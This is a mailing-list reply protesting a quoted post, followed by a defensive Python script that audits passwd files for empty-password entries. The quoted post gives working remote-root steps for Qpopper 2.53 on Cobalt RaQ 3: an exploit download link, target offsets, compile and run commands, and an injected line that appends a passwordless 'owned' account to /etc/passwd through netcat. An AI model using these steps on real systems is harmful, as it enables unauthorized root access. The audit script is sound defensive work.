
Re: [cobalt-security] Qpopper - remote root...



Why the heck would you publish that on an open list!
Geez Louise, think about the lurkers in here!! Man, am I going ballistic for
no reason?
Group?
Frank

> Hi,
> If you want to exploit a Cobalt RaQ 3, grab the Qpopper 2.53 exploit from
> http://www.hack.co.za/daem0n/pop/pop3/7350qpop.c, add the following line
> to the "targets[]" structure:
>   { "Cobalt OS 5.0: qpopper-2.53", 0xBFFFD368, 0xbfffdc18 },
> compile the exploit (gcc 7350qpop.c -o qpop-cobalt), and run it in the
> following fashion...:
> ./qpop-cobalt <target-id-you-made> foobar@xxxxxxxxxxx user@xxxxxxxxxxxxx
> echo owned::500:100:cracker:/:/bin/sh >>/etc/passwd 2>&1 >/dev/null | nc
> sendmail-server.com 25
> (user@xxxxxxxxxxxxx to, for example, gossi@xxxxxxxxxxxxxx, and
> sendmail-server.com to a mail server you can send through).  You'll need
> netcat installed on the box you are testing from.
> That'll add a remote user (owned, no password) to the cobalt.
> The attack doesn't require an account on the system - it simply needs you
> to know an account on the system which 'pop3' is being used to retrieve
> the mail of - I'd imagine this is a majority of accounts on Cobalts.
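
A defensive check for the artifact the quoted message describes, a passwd entry with an empty password field, as an added example that is not part of the original thread. The function name and every sample line except the quoted `owned` entry are constructed for illustration.

```python
"""Audit passwd-format text for entries like the one the quoted post appends."""

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

# Constructed sample; only the last line is taken from the quoted message.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "mail:x:8:12:mail:/var/spool/mail:/sbin/nologin\n"
    "alice:x:500:100:Alice:/home/alice:/bin/bash\n"
    "owned::500:100:cracker:/:/bin/sh\n"
)


def audit_passwd(text):
    """Return a list of (line_number, username, reason) findings."""
    findings = []
    seen_uids = {}  # uid -> first username that used it
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, passwd, uid, _gid, _gecos, home, shell = fields
        # An empty shell field defaults to /bin/sh, so it counts as a login shell.
        interactive = shell not in NOLOGIN_SHELLS
        if passwd == "":
            reason = "empty password field"
            if interactive:
                reason += " with login shell"
            findings.append((lineno, name, reason))
        if uid == "0" and name != "root":
            findings.append((lineno, name, "UID 0 but not root"))
        if uid in seen_uids:
            findings.append((lineno, name, f"UID {uid} shared with {seen_uids[uid]}"))
        else:
            seen_uids[uid] = name
        if home == "/" and interactive and uid != "0":
            findings.append((lineno, name, 'home directory "/" with login shell'))
    return findings


if __name__ == "__main__":
    for lineno, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {reason}")
```

To audit a live system, pass the contents of `/etc/passwd` to `audit_passwd` instead of the sample.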